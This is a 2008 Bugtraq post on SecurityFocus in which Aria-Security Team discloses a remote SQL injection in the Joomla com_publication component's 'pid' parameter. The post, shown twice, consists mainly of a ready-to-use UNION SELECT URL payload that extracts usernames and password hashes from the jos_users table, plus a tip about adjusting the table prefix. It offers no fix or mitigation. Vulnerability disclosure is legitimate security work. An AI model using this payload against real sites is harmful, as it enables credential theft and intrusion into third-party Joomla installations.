Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection
Feb 23 2008 10:14PM
No-Reply Aria-Security Net
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz: Aura, imm02tal, Kinglet, iM4n
Joomla Com_publication "pid" Remote SQL Injection
index.php?option=com_publication&task=view&pid=-9999999+union/**/select+
0,username,password,0,0,0,0/**/from/**/jos_users/*
note: the prefix (jos_) maybe different for each website...
Regards,
The-0utl4w
Credits Goes to Aria-Security Team
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
http://Aria-Security.Net
-------------------------------
Shoutz: Aura, imm02tal, Kinglet, iM4n
Joomla Com_publication "pid" Remote SQL Injection
index.php?option=com_publication&task=view&pid=-9999999+union/**/select+
0,username,password,0,0,0,0/**/from/**/jos_users/*
note: the prefix (jos_) maybe different for each website...
Regards,
The-0utl4w
Credits Goes to Aria-Security Team
[ reply ]